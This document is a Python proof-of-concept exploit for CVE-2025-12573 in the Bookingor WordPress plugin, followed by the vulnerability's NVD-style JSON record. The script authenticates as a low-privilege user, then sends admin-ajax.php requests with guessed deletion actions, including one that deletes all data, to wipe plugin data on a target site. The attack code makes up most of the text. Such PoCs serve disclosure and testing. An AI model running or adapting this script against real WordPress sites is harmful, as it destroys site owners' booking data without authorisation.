CVE-2025-12573

# CVE-2025-12573 Bookingor Plugin Exploit PoC # Authenticated low-privilege users can delete plugin data via unprotected AJAX actions import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" def get_wordpress_nonces(session, target_url): """Get necessary nonces from WordPress admin pages""" # This vulnerability doesn't require nonce verification # but we need a valid authenticated session return {} def exploit_bookingor_delete(session, action_name, data_params): """ Exploit unprotected AJAX action to delete bookingor data Parameters: - action_name: The AJAX action endpoint (e.g., 'bookingor_delete_booking') - data_params: Dictionary of parameters to send with the request """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { 'action': action_name, **data_params } headers = { 'Content-Type': 'application/x-www-form-urlencoded', } print(f"[*] Sending request to: {endpoint}") print(f"[*] Action: {action_name}") print(f"[*] Payload: {payload}") response = session.post(endpoint, data=payload, headers=headers) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") return response def main(): session = requests.Session() # Step 1: Authenticate as low-privilege user print("[*] Authenticating as low-privilege user...") login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies: print("[-] Authentication failed!") sys.exit(1) print("[+] Authentication successful!") # Step 2: Exploit the vulnerability - Delete booking data # Common AJAX actions that might be vulnerable: vulnerable_actions = [ 'bookingor_delete_booking', 'bookingor_delete_availability', 'bookingor_delete_settings', 'bookingor_delete_all_data' ] for action in vulnerable_actions: print(f"\n[*] Testing action: {action}") params = {'id': 1} # Target ID to delete exploit_bookingor_delete(session, action, params) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12573", "sourceIdentifier": "[email protected]", "published": "2026-01-20T06:16:00.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bookingor WordPress plugin through 1.0.12 exposes authenticated AJAX actions without capability or nonce checks, allowing low-privileged users to delete Bookingor WordPress plugin through 1.0.12 data."}, {"lang": "es", "value": "El plugin de WordPress Bookingor hasta la versión 1.0.12 expone acciones AJAX autenticadas sin comprobaciones de capacidad o nonce, permitiendo a usuarios con pocos privilegios eliminar datos del plugin de WordPress Bookingor hasta la versión 1.0.12."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/b6198d76-813c-4f13-8b3d-b4609095ae34/", "source": "[email protected]"}]}}